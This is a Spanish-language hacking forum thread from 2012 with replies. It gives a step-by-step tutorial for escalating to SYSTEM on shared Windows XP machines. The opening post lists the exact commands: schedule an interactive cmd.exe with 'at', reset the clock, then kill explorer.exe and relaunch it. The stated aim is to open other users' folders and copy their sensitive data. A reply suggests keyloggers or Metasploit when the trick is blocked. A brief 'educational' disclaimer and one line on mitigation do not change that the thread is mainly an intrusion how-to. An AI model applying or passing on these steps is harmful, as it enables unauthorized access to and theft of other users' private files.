Escalar Privilegios Localmente desde CMD Windows XP

Iniciado por Muppet, Junio 23, 2012, 01:03:21 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Junio 23, 2012, 01:03:21 AM Ultima modificación: Mayo 02, 2014, 11:30:12 AM por Expermicid
Escalar Privilegios Localmente desde CMD Windows XP

Esto funciona en un entorno donde multiples Usuarios Utilizan el mismo pc y nosotros poseemos acceso a uno de ellos
Me decidi a Postiarlo aunq seguramente Muchos ya lo conocen porq no lo encontre en la seccion Windows.

Empecemos:

Abrimos cmd.exe y ejecutamos el siguiente codigo

at "time" /interactive cmd.exe

Este comando crea un proceso q se ejecutara a cierta hora,
el fallo esta en q el paramentro /interactive ejecuta el proceso con permisos de System

luego con el comando Time podremos setear la hora del reloj a la q establecimos previamente Ej:

at 00:33 /interactive cmd.exe



Ahora seteamos el clock a 00:33

Time 21:33



vemos como una consola aparece corriendo como System,
ahora lo entretenido cerraremos explorer.exe del usuario anterior y lo abriremos como System

taskkill /IM explorer.exe
explorer.exe




Vemos como Ahora podemos explorar de forma grafica el Disco Siendo System, esto nos permite
ir a X:\Document and Settings y entrar en la carpeta de Cualquier Usuario (de otra forma estariamos limitados a nuestra Carpeta Personal)
y copiar informacion sensible q necesitemos





Renuncia: El contenido de este Tutorial es puramente educativo, y todo uso mal intencionado correra bajo la responsabilidad del actor

PD: Es una tecnica muy vieja pero hasta el dia de hoy existen empresas con este fallo, poniendo en compromiso la informacion de sus usuarios.

Existen Diferentes Metodos para evitar este fallo, el mas comun es limitar el uso de los comandos at y time a usuarios de mayor privilegio.

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".
Junio 23, 2012, 09:55:51 AM #1
Muchas gracias por compartir, si el aporte que quieres realizar no se encuentra en el foro crealo no hay ningún drama.
Dicen que todo sirve en esta vida...
Saludos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Junio 23, 2012, 03:54:41 PM #2
funciona bien pero que pasa si no tenemos privilegios de admin y el comando at está blokeado.

ya no nos funciona en este caso

pero aun asi es bueno todavia

Veo Una Energia Que Con Deceo de Justicia... Veo Mas Alla de LAs Letras Escritas...
Veo Un Hacktivismo Puro... Nacido De lo Mas Profundo De un Corazon..
Con La Mirada Firme En Defender Mis Ideales...

Junio 23, 2012, 04:31:59 PM #3
Como dice el Post eso es una forma de evitar el fallo, si estubieramos con un usuario limitado primero deberiamos aplicar algun metodo para poder subir nuestros privilegios, tanto con un keylogger, Metasploit, etc.

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".
Imprimir
Ir Arriba Páginas1
Acciones del Usuario